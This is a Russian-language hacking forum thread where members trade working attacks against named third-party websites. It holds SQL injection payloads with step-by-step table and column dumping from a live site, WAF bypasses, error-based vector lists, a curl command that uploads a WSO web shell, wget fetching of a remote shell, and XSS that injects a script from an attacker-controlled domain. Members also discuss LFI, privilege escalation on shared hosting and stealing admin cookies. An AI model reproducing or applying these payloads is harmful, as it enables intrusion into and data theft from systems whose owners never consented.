madhatter said:
Вы таки не поверите, но wget -O s.php http://site/shell.ext. Или curl. Или что угодно подобное.


Таки может и поверил бы, если бы знал что да как)За совет спасибо, помогло!

vikler said:
Вопрос. Сайт с post-инъекцией

Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj&Password=gggggggggggg%27

Вроде как стандартная error based. Но при попытке получения любой информации поучаю редирект на сообщения о неверности un/pw:

Code:
http:// www.umg- aec.com/verifpwd.asp?User name=hjjjjjjjjjj'&Password=gggggggggggg+OR+1=@@version--

Как обойти/раскрутить?


Смотрите в эту cторону:


POST /forgotpasswordsubmit.asp
username
=
'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('Pages','Ima gePresets','Project','ImageUploadServers', 'NetherlandPubPhotos','dtproperties','Images'))--

YaBtr said:
Смотрите в эту cторону:


Error Type:

Microsoft OLE DB Provider for SQL Server (0x80040E14)

Incorrect syntax near the keyword 'or'.

vikler said:
Error Type:
Microsoft OLE DB Provider for SQL Server (0x80040E14)
Incorrect syntax near the keyword 'or'.


Все прекрасно выводит:


Microsoft OLE DB Provider for SQL Server (0x80040E07)
Conversion failed when converting the nvarchar value '
ImagesBackUp
' to data type



upd

Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.

YaBtr said:
Знак "+" урленкодится, поэтому у Вас и происходит эта ошибка. Перехватите пакет и исправьте урленкод.


спасибо. Действительно, я и не подумала. Теперь всё отлично

ребят , на сайте пентестер нашел один файл *.php

содержимое такое:

http://s017.radikal.ru/i413/1408/44/0a7267bfdf66.jpg

Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))

насколько это верно? движок сайта - WP.

Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.

bumer said:
Ребят подскажите с чего начинать свой путь изучения уязвимостью сайтов, создавать я их научился, продвигать более менее тоже. Теперь хочу дальше развиваться, накидайте кто нить ссылок полезных, можно в ЛС, готов как то отблагодарить.


Раздел "Статьи" и пошел штудировать

B1t.exe said:
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:
http://s017.radikal.ru/i413/1408/44/0a7267bfdf66.jpg
Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.


Все верно, все файлы *.php в текущем каталоге будут удалены.

Причем этот файл сам себя удалит, тем самым типа "заметет следы"

UXOR said:
Все верно, все файлы *.php в текущем каталоге будут удалены.
Причем этот файл сам себя удалит, тем самым типа "заметет следы"


Спасибо.

а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?

просто смысл удаления всех файлов.. хочу понять мотив.

B1t.exe, возможно закладка от программера на случай кидка.

B1t.exe said:
ребят , на сайте пентестер нашел один файл *.php
содержимое такое:
http://s017.radikal.ru/i413/1408/44/0a7267bfdf66.jpg
Ок говорит, что если перейти по URL к этому файлу, то удалится все php файлы на сайте. И что это своеобразная логическая бомба )))
насколько это верно? движок сайта - WP.


Почти верно, с тем отличием что .php удалятся не "на сайте", а только в той же директории, что и сам файл.

Строго говоря, да, это логическая бомба, но очень примитивная и никак не замаскированная.


а это что за прикол? самописный (от разработчика сайта) или сайт взломали и ставили?
просто смысл удаления всех файлов.. хочу понять мотив.


Выше вы упомянули, что сайт на wp. В wp такого кода явно нет, как и "разработчика сайта" в данном случае. Вариантов тут масса, и как уже сказали, это может быть делом рук той мартышки, что ставила вордпресс.

>> сайт взломали и ставили?

Этот вопрос вам надо задавать "пентестеру", а не здесь. Смотрите логи(что может быть проблемно, если ворпресс на дешевом\херовом шаред-хостинге), смотрите даты и все что есть по сайту. Одно можно сказать наверняка - в вордпрессе такого нет, что очевидно. К тому же, простое удаление особо бесполезно, т.к. бекапы все-таки принято делать. Скорее всего, где-нибудь есть аналогично оставленное выполнение кода.

возможно ли использовать sql инъекцию не только на чтение данных но и на запись ?

например заменить хеш пароля на извесный и провести авторизацию в админку

GAiN, инъекции бывают в INSERT/UPDATE - соответственно, да, возможно.

Пример, регистрация:


Code:
$username = $_POST['username'];
$password = $_POST['password'];
INSERT INTO users ('$username', '$password');

Инъекция:


Code:
username=...&password=...'),('admin', 'pass')#

А не поделиться кто нить списком запросов к бд, через адресную строку. Для нагрузки на сервер.

bumer said:
А не поделиться кто нить списком запросов к бд, через адресную строку. Для нагрузки на сервер.


/showpost.php?p=407227&postcount=3 читай про BENCHMARK

Подскажите как раскрутить эту иньекцию:


http://site.ru/announcements/123'/
Ошибка базы данных при выполнении запроса: SELECT m.material_id, material_title FROM material m INNER JOIN rubric_material rm ON m.material_id = rm.material_id WHERE rubric_id = '2545' AND material_file = '123'' .
MySQL:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''123''' at line 6

BuG_4F said:
Подскажите как раскрутить эту иньекцию:


http://site.ru/announcements/123'+and+1=1+--+/

и по накатанной, а дальше если, что не так, иди к шайтану.

Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection.

Узнал версию, имя базы, но при обращении к ней выдает ошибку

Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users'

Значит, я никак не раскручу скулю или есть варианты?

billybonse said:
Парни, нашел уязвимость пытаюсь раскрутить ее через blind injection.
Узнал версию, имя базы, но при обращении к ней выдает ошибку
Invalid query: SELECT command denied to user 'xxxxxx'@'xxxxx' for table 'users'
Значит, я никак не раскручу скулю или есть варианты?


скорее всего обращаешься к таблице users из базы mysql, а доступ к нему не всегда есть.

ищи подходящие таблицы в текущей базе

select table_name from information_schema.tables where table_schema=database()

Konqi, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос:

CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) --

Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'

billybonse said:
Konqi
, буду очень благодарен, если подскажете на примере, как осуществить. Вот мой запрос:
CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2))) --
Ответ: Invalid query: Duplicate entry '5.1.311' for key 'group_key'


CatID=2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select table_name from information_schema.tables where table_schema=database() limit 0,1), 1, 63), FLOOR(RAND(0)*2))) --

Спасибо, помогло! Кручу дальше!

где можно найти инфу про то какие браузеры какие симолы урл энкодят?

к примеру фф превращает ' в %27 а опера нет.

где найти инфу об этом?

помогите админа вытащить

http://www.grc.tomsk.ru/

GET vote%5B2%5D%5B%5D=7 - скуля

почему то дальше имени бд не идет.

Привилегия File, Dba - False

В sqlmap есть команда --sql-shell

sql-shell> Что дальше ? Не пойму с командами , как понял select MiniShell into outfile "/dir/shell.php"

Прошу помощи

Code:
site.com/index.php?id=1+union+select+1,2,3+--+

Forbidden

You don't have permission to access /index.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Code:
site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+

[DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1

wtf?

Как узнать корневую папку до сайта?

Есть полные права , не могу залить шелл , не зная корневую папку

erwap said:

Code:
site.com/index.php?id=1+union+select+1,2,3+--+

Forbidden
You don't have permission to access /index.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

Code:
site.com/index.php?id=1+un/**/ion+se/**/lect+1,2,3+--+

[DATABASE ERROR:]1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'un/**/ion se/**/lect 1,2,3 --' at line 1
wtf?


Not WTF - WAF.


Как узнать корневую папку до сайта?
Есть полные права , не могу залить шелл , не зная корневую папку


1) Перебор

2) Чтение конфигов, раз есть file_priv

3) Выбивание ошибок из скриптов

4) Гугление по варнингам\еррорам\нотисам для site:site.com

madhatter said:
1) Перебор
2) Чтение конфигов, раз есть file_priv
3) Выбивание ошибок из скриптов
4) Гугление по варнингам\еррорам\нотисам для site:site.com


Какие именно конфиги?

yeti2 said:
Какие именно конфиги?


Конфиги, вы не поверите, веб-сервера, который обсуживает виртуальные хосты. То ли в уязвимостях, то ли в избранном есть топик со списками дефолтных путей к конфигам.

Ребят,посоветуйте в какую сторону копать,плз

Ситуация такая:

Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php

Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача)

Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга.

В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа)

Собственно,интересно узнать:

1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы?

2)каким образом можно выудить куки админа?

3)другие возможные векторы атак

Help me,guys,please

HeaVeNSeR said:
Ребят,посоветуйте в какую сторону копать,плз
Ситуация такая:
Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php
Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача)
Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга.
В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа)
Собственно,интересно узнать:
1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы?
2)каким образом можно выудить куки админа?
3)другие возможные векторы атак
Help me,guys,please


1) Зависит от ядра

2) xss

3) другие возможные векторы атак

HeaVeNSeR said:
Ребят,посоветуйте в какую сторону копать,плз
Ситуация такая:
Жертва на DLE 9.x,админка доступна по адресу site.com/admin.php
Есть шелл на соседе,с правами юзера соседа(попасть в папку "public_html" жертвы нет прав,нужны минимум права апача)
Есть доступ к access логам жертвы.Судя по логам в админку он заходит редко,либо админит в основном через панель хостинга.
В папке /tmp хранятся файлы сессий всех сайтов на сервере,но доступа к их содержимому нет(для входа в админку DLE нужно в куках передать переменную с пассом админа)
Собственно,интересно узнать:
1)возможно ли повысить права до апача? или есть другие способы пробраться в папку сайта жертвы?
2)каким образом можно выудить куки админа?
3)другие возможные векторы атак
Help me,guys,please




kingbeef said:
1) Зависит от ядра
2) xss
3) другие возможные векторы атак


1) Uname: Linux 2.6.18-371.1.2.el5PAE #1 SMP Tue Oct 22 13:40:39 EDT 2013 i686

Рут маловероятен,интересно подняться до апача.Возможно ли это вообще?

2) С техникой эксплуатации ХСС мало знаком,но т.к. админ почти не заходит на сайт и версия ДЛЕ более-менее свежая(>9.5,паблик хсс под нее не встречал) - "кража" кук мне представляется невозможной

Известна почта админа(которая находится на том же сервере,что и сайт) - возможно ли получить куки,отправив "специальное" письмо админу?

3) Smooth

нашел на одном из сайтов _http://armydocs.ru/config.php , как это работает, сталкивался кто нибудь?

Br@!ns said:
нашел на одном из сайтов _http://armydocs.ru/config.php , как это работает, сталкивался кто нибудь?


Да в общем-то ничего. Стандартный Symlink, который данные из конфигов с соседних сайтов.

MaxFast said:
Да в общем-то ничего. Стандартный Symlink, который данные из конфигов с соседних сайтов.


неполучается стянуть, или тут он не работает?)

Code:
http://www..**********/pixsell/imageview.php?id=392751 union/*!select*/ (1),(2),(user()),(4),(5),(6),(7),(8),(9),(10),(11) ,(12)

Ребят подскажите как через wso шелл создать бд

cyborgx said:
Ребят подскажите как через wso шелл создать бд


во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!

_http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.

Br@!ns said:
_http://www.moysvet.ru/catalog/view/118876' помогите раскрутить, всю голову сломал уже.


http://www.moysvet.ru/catalog/view/118876'or(ExtractValue(1,concat(0x3a,(select(versi on())))))='1

Помогите раскрутить скулю


http://www.stu.lipetsk.ru/announcements/7595'/

Есть участок кода на чужом сайте:


Code:


Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.

Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?

.

Inkognito2008 said:
Есть участок кода на чужом сайте:

Code:


Содержимое http://site.ru я могу редактировать, то есть в переменной $data подконтрольный текст и он выводится на стороннем сайте.
Какая тут уязвимость, возможно ли выполнение произвольного кода или создание php файла на сервере или тут только XSS?


Можешь попробовать заюзать как локальную читалку! eval реализовать не получится, так как вывод через echo $data;

Ищи конфиги БД и пробуй подключиться!

winstrool said:
Ищи конфиги БД и пробуй подключиться!


Сайт без БД, то есть код выполнить никак нельзя?

Если говорить точнее то вывод идет через:


Code:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;

Вывод подхватывается JS и выводится на сайте.

Inkognito2008 said:
Сайт без БД, то есть код выполнить никак нельзя?
Если говорить точнее то вывод идет через:

Code:
$GLOBALS['_RESULT']=array( "otvet" => "тут строка моя" ); exit;

Вывод подхватывается JS и выводится на сайте.


тогда ищи уязвимости в функциях и пробуй их реализовать, можно еще попробовать сайты соседей посмотреть...

Помогите составить запрос в sqlmap на sql inj cookie

sqlmap.py -u "http://site:.com/index.php" --cookie="cacheSession=*" --random-agent --level=2 --risk=1

верно? Он то показывает блинд , то нет

winstrool said:
во вкладке [SQL] вводишь данные для подключения к БД, там появляется консоль, в ней уже вводишь команды для создание БД, почитай справочник _ttp://www.mysql.ru/docs/man/Database_use.html полезно будет!


допустим через админку я залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?

Помогите раскрутить


HTML:
http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND

Br@!ns said:
Помогите раскрутить

HTML:
http://www.svetodom.ru/brand/jhkhjkhjk
http://www.svetodom.ru/brand/jhkhjkhjk+AND



а что сложного использовать error-based?

например ExtractValue


1 and ExtractValue(1,concat(0x5c,((select+table_name+fro m+information_schema.tables+limit+30,1))))+--+

Br@!ns, еще добавлю, что нынче модно использовать короткие запросы. Вот еще для изучения пару векторов с выводом через error-based (VolgaCTF::MySQL Game):


'=0 group by elt(rand(),version())having sum(0)#




'-updatexml(0,repeat(version(),2),2)#




'-(SELECT*FROM(SELECT name_const(version(),1),name_const(version(),1))a) #




'+9*~(select*from(select@@version)x)#




'||1 group by elt(rand(0),version())having sum(0)#




'|(select!x-~0.FROM(select version()x)f)#



[QUOTE="None"]
'

Подскажите плиз

залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?

cyborgx said:
Подскажите плиз
залил шелл, ввел данные для подключения к БД данного сайта, зашел, появилась консоль в ней я могу создать новую базу данных(чистую) не затрагивая уже существующую и создать на серваке еще один сайт?


нет...

Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.

Можно ли такое раскрутить?

int said:
Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.
Можно ли такое раскрутить?


База на другом сервере ----> ничего не получится.

int said:
Инъекция в INSERT. Вывод ошибок есть. Пытаюсь использовать error based вектор, но таблицы в которую происходит INSERT на сервере нету.
Можно ли такое раскрутить?


Посмотрите где расположена БД.


UXOR said:
База на другом сервере ----> ничего не получится.


Если есть данные от админки, то вполне получится.

winstrool said:
Посмотрите где расположена БД


Как это сделать? В сообщение об ошибке SQL данной информации нет.


Code:
Table 'db_name.table_name' doesn't exist SQL=INSERT INTO table_name ( id, info ) VALUES ( 1, 'data' and updatexml(1,concat(0x3a,version(),2) or '')

int said:
Как это сделать? В сообщение об ошибке SQL данной информации нет.

Code:
Table 'db_name.table_name' doesn't exist SQL=INSERT INTO table_name ( id, info ) VALUES ( 1, 'data' and updatexml(1,concat(0x3a,version(),2) or '')



user() - если выпадет IP сравни его с IP сайта, в ином случае БД на серваке с сайтом.

winstrool said:
user() - если выпадет IP сравни его с IP сайта, в ином случае БД на серваке с сайтом.


Так user() не будет выполнен, т.к. mysql сервер сначала проверяет существование таблицы, в которую происходит вставка.


Code:
insert into non_existing_table(id, info) values(1,(select user()))
// #1146 - Table 'data_base.non_existing_table' doesn't exist

Может быть я не корректно задал вопрос. Уточню, что скорее всего таблица просто удалена, а не находится на другом сервере, но при этом есть уязвимый скрипт, который пытается обратиться к ней.

Подскажите, в данном случае:


Code:
/about/news/1'/

Возможно ли раскрутить SQL и добиться вывода инфы? Любым способом, error-based, blind, time-based и так далее.

Все векторы перепробовал, никак не получается.

er9j6@ said:
как вариант

PHP:


/about/news/1'and(select*from(select(name_const(version(),1)), name_const(version(),1))a)and'/


А если version() заменить на user() или database(), то какой результат получим?

Интересует рабочий запрос, а работоспособность вектора с name_const определяется как раз по user(), или любого произвольного значения а не в выводе версии.

Хотя, если ты осилил раскрутку через name_const то покажи как что то кроме версии вытащить.

А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?


Code:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,databa se(),10)#/

:User: u74960@10.8.1.153

Database: u74960

Inoms said:
А почему бы не передать комментарий в raw форме, как это сделано с кавычкой ?

Code:
/about/news/1123123')union(select(1),2,3,4,5,6,user(),8,databa se(),10)#/

:User: u74960@10.8.1.153
Database: u74960


Спасибо большое! Не додумался до посылки сырых запросов. Выручил.

как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю

Mysql = 4.1

пробовал добавлять --technique=B , --technique=T

erwap said:
как заставить sqlmap перебирать columns посимвольно? Предлогает только перебор по словарю
Mysql = 4.1
пробовал добавлять --technique=B , --technique=T


в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.

Вывод - не заставишь. Для ветки 4.* такой технологии нет.

BigBear said:
в 4ой ветке нету Information_schema. Соответственно - ты не можешь производить операции считывания имени таблиц через функции mid(), substr(), substring(), left(), right() из системной таблицы, тк самой такой таблицы содержащей имена всех таблиц просто напросто нет.
Вывод - не заставишь. Для ветки 4.* такой технологии нет.


Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.

ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться

erwap said:
Да я в курсе насчет этого, есть же бинарный поиск посимвольно, но почему то скульмап мне предлогает столбцы подбирать перебором через словарь.
ЗЫ: time-based, boolean-based я руками не осилил, поэтому и приходится изощряться


поэтому и предлагает перебирать по словарю. information_schema там нет. бинарный поиск посимвольно работает только если есть что искать

На сайт загружен php файл с таким содержимым:


PHP:


Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.

Грабитель, Для MySQL 4 в настоящее время нет вектора атак, позволяющего получить списки таблиц (в select запросе) подобно чтению information_schema в MySQL 5. Единственный метод - брут таблиц по словарю, исключая редкие нюансы, например такие как:


Возможность доступа к ФС

Наличие таблицы с отладочной информацией

Возможность исполнения нескольких запросов за один раз (при использовании mysqli::multi_query, etc)

etc



TIGERSSS said:
На сайт загружен php файл с таким содержимым:
Как с его помощью выполнить, или загрузить туда wso шелл? На примере готовой команды пожалуйста.




PHP:
curl-F"F1l3=@/home/user/shell/wso2.php"-F"Name=/var/www/wso2.php"http://site.com/file.php

Добрый день.

Имеется сайт с XSS: http://site.com/?name=XSS_TEXT

Html код этой страницы такой:


Code:



...


В свою очередь http://site.com/javascript-file.js?param=XSS_TEXT отдает вот что:


Code:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : "XSS_TEXT"
}
};

Проблема в том что режется ' , ( , ) , scripts .

Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:

http://site.com/javascript-file.js?param="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"


Code:
var sss = {
"param1" : 1,
"param2" : {
"param3" : 3,
"param4" : ""}};
document.head.childNodes[1].src="http://mysite.com/global.js";
var b={"1":{"1":""
}
};

Fосле выполнения моего кода http://site.com/?name="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:


Code:



...



src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)

Спасибо

XAMEHA said:

PHP:
curl-F"file=@/home/user/shell/wso2.php"-F"Name=/var/www/wso2.php"http://site.com/file.php





А можно еще детальнее?

Я ведь не введу в адресную строку браузера это?

TIGERSSS,

https://ru.wikipedia.org/wiki/CURL

TIGERSSS, Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.

WendM, Строки можно представить в HEX-виде. Для выполнения можно использовать document.location и протокол javascript (не уверен, что схема заработает на всех современных браузерах).

XAMEHA said:
TIGERSSS,
Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.


Пример загрузки, или выполнения wso шелла с её помощью.

Code:
curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php

где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта.

если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же

подскажите,пожалуйста.

при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--

как можно вытащить таблицы из базы?

madam said:
подскажите,пожалуйста.
при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--
как можно вытащить таблицы из базы?


у вас функция count(table_name) — она выводит количество таблиц в вашей базе. чтобы вывести таблицы, запрос будет примерно таким:


Code:
?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x7e,0x27,table_name,0x27,0x7e)+from+`i nformation_schema`.tables+where+table_schema=0x6A7 57374626974635F626974707463+limit+1,1),0x313032353 43830303536--

и да, havij — грешно. нормальный запрос бы выглядел так:


Code:
+union+select+1,table_name,2+from+`information_sch ema`.tables+where+table_schema=0x6A757374626974635 F626974707463+limit+1,1--+

далее перебирайте limit.

спасибо конечно,вот только без havij никак,редирект на главную стр.(

да и havij дальше имя базы не продвигается((

вот ссылка http://bitptc. com/recommends/?id=5 db justbitc_bitptc

тогда в вашем случае стоит раскручивать как blind sql.


Code:
http://bitptc.com/recommends/?id=5+and+1=1--+

- редирект (значит запрос корректен)


Code:
http://bitptc.com/recommends/?id=5+and+1=2--+

- нет редиректа

забавный случай. ответ отдается в редиректе, то есть при запросе


Code:
http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+

получим ответ в редиректе с версией

http://savepic.org/6182691.png

faza02 said:
забавный случай. ответ отдается в редиректе, то есть при запросе

Code:
http://bitptc.com/recommends/?id=-5+union+select+1,version(),3--+

получим ответ в редиректе с версией
http://savepic.org/6182691.png


все правильно, но таблицы вывести не получится, прав не хватит

есть там всё


Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!table_name*/,3+from+information_schema.tables--+

блин((

а как теперь из таблицы например microfaucet_users вывести имена столбцов?

madam said:
блин((
а как теперь из таблицы например microfaucet_users вывести имена столбцов?




Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+

faza02 said:

Code:
http://bitptc.com/recommends/?id=-5+union+select+1,/*!column_name*/,3+from+information_schema.columns+where+/*!table_name*/=0x6d6963726f6661756365745f7573657273--+



спасибо)) только логин и пасс админа всё равно не нашла(( видать в конфиге спрятал))

какие возможные алгоритмы для определния sqli? то, что пришло в голову:

берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?

faza02 said:
какие возможные алгоритмы для определния sqli? то, что пришло в голову:
берем уязвимый параметр, подставляем в параметр сначала id=5+and+1=1-- и сравниваем размер страницы (или diff) с первоначальной (id=5). если результат одинаковый, то id=5+and+1=2-- и также сравниваем с размером исходной страницы. ваши идеи? что делать в случае, если на странице рандомно генерируемые объекты?


иногда тупо order by помогает определить уязвимость

это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)

faza02 said:
это ты глазами увидишь, а как быть с автоматизацией? вомзожен такой вариант, что размер страницы особо не поменяется (пара кб или меньше)


Как вариант можно рассмотреть через sleep(), как то на практике встречалась уязвимость, которая генерировала координаты на картинке, само тело страници не менялось, зато менялся вес картинки, пришлось писать скрипт для автоматизации скули где вес картинки больше n-го размера, там true.

Столкнулся тут с oracle. Иньекция ли это и возможно ли её раскрутить?

есть поле ввода, ввожу параметр ;; и выдаёт ошибку:


Code:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50901: text query parser syntax error on line 1, column 3 ORA-06512: at line 1

ввожу ">qweqweqwe;


Code:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold QWEQWEQWE ORA-06512: at line 1

ввожу ">order+by+1;


Code:
java.sql.SQLException: ORA-20000: ORA-29902: error in executing ODCIIndexStart() routine ORA-20000:
Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ;
ORA-06512: at "SYS.DBMS_SQL", line 1841 ORA-06512: at "MP.MP_GATE", line 668 ORA-06512: at "MP.MP_GATE", line 681 ORA-29902: error in executing ODCIIndexStart()
routine ORA-20000: Oracle Text error: DRG-50900: text query parser error on line 1, column 4 DRG-50905: invalid score threshold ORDER+BY+1 ORA-06512: at line 1

ввести select, union в любом регистре, откоментировать -- или /* не возможно, nginx фильтрует и сразу редиректит на страницу с ошибкой

Прошу помощи

как получать ссылку на некоторые элементы, например на лайки или палец вверх ?

https://pp.vk.me/c540105/c624031/v624031076/9106/F7-PPzt3gcM.jpg

вот например тут - как узнать запрос к этой кнопке ? и подобным кнопкам не имеющих в коде ссылок

GAiN said:
как получать ссылку на некоторые элементы, например на лайки или палец вверх ?
https://pp.vk.me/c540105/c624031/v624031076/9106/F7-PPzt3gcM.jpg
вот например тут - как узнать запрос к этой кнопке ? и подобным кнопкам не имеющих в коде ссылок


посмотреть на сниффере, куда он отправляется. charles или tamper data в firefox.

Ребят, подскажите с обрезанием окончания к LFI


http://l2blackbird.com/index.php?id=../forums/index




http://l2sexi.es/?pagina=../index




http://en.l2vintage.cl/index.php?page=../pages/project

RedX said:
Ребят, подскажите с обрезанием окончания к LFI


Альтернатива нулл байту не срабатывает(

дыра на сервере / сайте

В общем какая-то зараза залезла на сервер.

Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым:


PHP:



Искал и айболитом и с помощью:

find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt

что-то находил, что-то удалял, но пока не помогло.

чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.

ghost1k said:
В общем какая-то зараза залезла на сервер.
